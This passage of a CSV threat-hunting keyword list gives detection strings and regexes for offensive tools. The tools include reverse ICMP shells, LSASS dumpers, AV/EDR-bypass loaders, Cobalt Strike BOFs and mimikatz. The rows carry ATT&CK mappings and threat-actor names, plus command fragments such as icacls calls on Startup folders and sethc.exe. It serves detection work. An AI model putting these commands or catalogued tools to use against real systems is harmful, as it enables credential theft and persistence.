archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48106" "*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*",".{0,1000}iAmAnIndependentStrongPassswordThatNeedsToBeSecure.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","48107" "*I-Am-Jakoby/ShellSync*",".{0,1000}I\-Am\-Jakoby\/ShellSync.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","48108" 
"*iamlordvoldemort@31337schoolofhackingandwizardry.com*",".{0,1000}iamlordvoldemort\@31337schoolofhackingandwizardry\.com.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#email","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48109" "*iammaguire/Gotato*",".{0,1000}iammaguire\/Gotato.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","48110" "*iangshan@360RedTeam*",".{0,1000}iangshan\@360RedTeam.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","#content","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","48111" "*IAS -Process *aad3b435b51404eeaad3b435b51404ee*",".{0,1000}IAS\s\-Process\s.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","48112" "*IAS -Process {GNLPH}*$excludedUsernames=@(""Guest*DefaultAccount*WDAGUtilityAccount*",".{0,1000}IAS\s\-Process\s\{GNLPH\}.{0,1000}\$excludedUsernames\=\@\(\""Guest.{0,1000}DefaultAccount.{0,1000}WDAGUtilityAccount.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","48113" "*ibmiscanner2john.py*",".{0,1000}ibmiscanner2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48114" "*ibnejdfjmmkpcnlpebklmnkoeoihofec*",".{0,1000}ibnejdfjmmkpcnlpebklmnkoeoihofec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","48115" 
"*IBurpExtender.java*",".{0,1000}IBurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","48116" "*IBurpExtenderCallbacks.java*",".{0,1000}IBurpExtenderCallbacks\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","48117" "*icacls ""%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%appdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48119" "*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48121" "*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48123" "*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48125" "*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48127" "*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup"" 
2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48129" "*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","48131" "*icacls c:\windows\system32\sethc.exe*",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","48154" "*icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant ""everyone"":(OI)(CI)M*",".{0,1000}icacls\.exe\sC\:\\ProgramData\\Oracle\\Java\\\.oracle_jre_usage\s\/grant\s\""everyone\""\:\(OI\)\(CI\)M.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - 
TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","48156" "*ICAgICAgIF9fICAgXyBfXyAgICAgICAgX18gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXyAKICBfX18gLyAvICAoXykgL19fX19fIF8vIC9fX19fIF8gIF9fXyBfX19fIF8gIF9fXyAgX19fIF8oXykKIChfLTwvIF8gXC8gLyAgJ18vIF8gYC8gX18vIF8gYC8gLyBfIGAvIF8gYC8gLyBfIFwvIF8gYC8gLyAKL19fXy9fLy9fL18vXy9cX1xcXyxfL1xfXy9cXyxfLyAgXF8sIC9cXyxfLyAvXy8vXy9cXyxfL18vICAKPT09PT09*",".{0,1000}ICAgICAgIF9fICAgXyBfXyAgICAgICAgX18gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXyAKICBfX18gLyAvICAoXykgL19fX19fIF8vIC9fX19fIF8gIF9fXyBfX19fIF8gIF9fXyAgX19fIF8oXykKIChfLTwvIF8gXC8gLyAgJ18vIF8gYC8gX18vIF8gYC8gLyBfIGAvIF8gYC8gLyBfIFwvIF8gYC8gLyAKL19fXy9fLy9fL18vXy9cX1xcXyxfL1xfXy9cXyxfLyAgXF8sIC9cXyxfLyAvXy8vXy9cXyxfL18vICAKPT09PT09.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","48158" "*icebreaker:P@ssword123456*",".{0,1000}icebreaker\:P\@ssword123456.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48159" "*icebreaker-master.zip*",".{0,1000}icebreaker\-master\.zip.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48160" "*icebreaker-scan.xml*",".{0,1000}icebreaker\-scan\.xml.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","48161" "*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","48162" "*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","48163" "*IcebreakerSecurity/PersistBOF*",".{0,1000}IcebreakerSecurity\/PersistBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - 
Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","48164" "*ice-wzl/wmiexec2*",".{0,1000}ice\-wzl\/wmiexec2.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","48165" "*icmpBackdoor*",".{0,1000}icmpBackdoor.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","48166" "*ICMP-ReceiveFile.py*",".{0,1000}ICMP\-ReceiveFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in 
restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","48167" "*Icmp-Redirect.py*",".{0,1000}Icmp\-Redirect\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","48168" "*ICMP-SendFile.py*",".{0,1000}ICMP\-SendFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","N/A","4","321","63","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z","48169" "*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48170" "*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48171" 
"*icmpsh.git*",".{0,1000}icmpsh\.git.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","N/A","10","10","1573","415","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z","48172" "*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48173" "*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48174" "*icmpsh-m.*",".{0,1000}icmpsh\-m\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48175" "*icmpsh-m.c*",".{0,1000}icmpsh\-m\.c.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48176" 
"*icmpsh-m.pl*",".{0,1000}icmpsh\-m\.pl.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","48177" "*icmpsh-master*",".{0,1000}icmpsh\-master.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","N/A","10","10","1573","415","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z","48178" "*icmpsh-s.*",".{0,1000}icmpsh\-s\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48179" "*icmptunnel*",".{0,1000}icmptunnel.{0,1000}","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. 
The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","48180" "*icyguider/DumpNParse*",".{0,1000}icyguider\/DumpNParse.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","48181" "*icyguider/LatLoader*",".{0,1000}icyguider\/LatLoader.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","1","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","48182" "*icyguider/LightsOut*",".{0,1000}icyguider\/LightsOut.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","48183" "*icyguider/Shhhloader*",".{0,1000}icyguider\/Shhhloader.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","48184" "*icyguider/UAC-BOF-Bonanza*",".{0,1000}icyguider\/UAC\-BOF\-Bonanza.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 
- T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","48185" "*id::modify*",".{0,1000}id\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 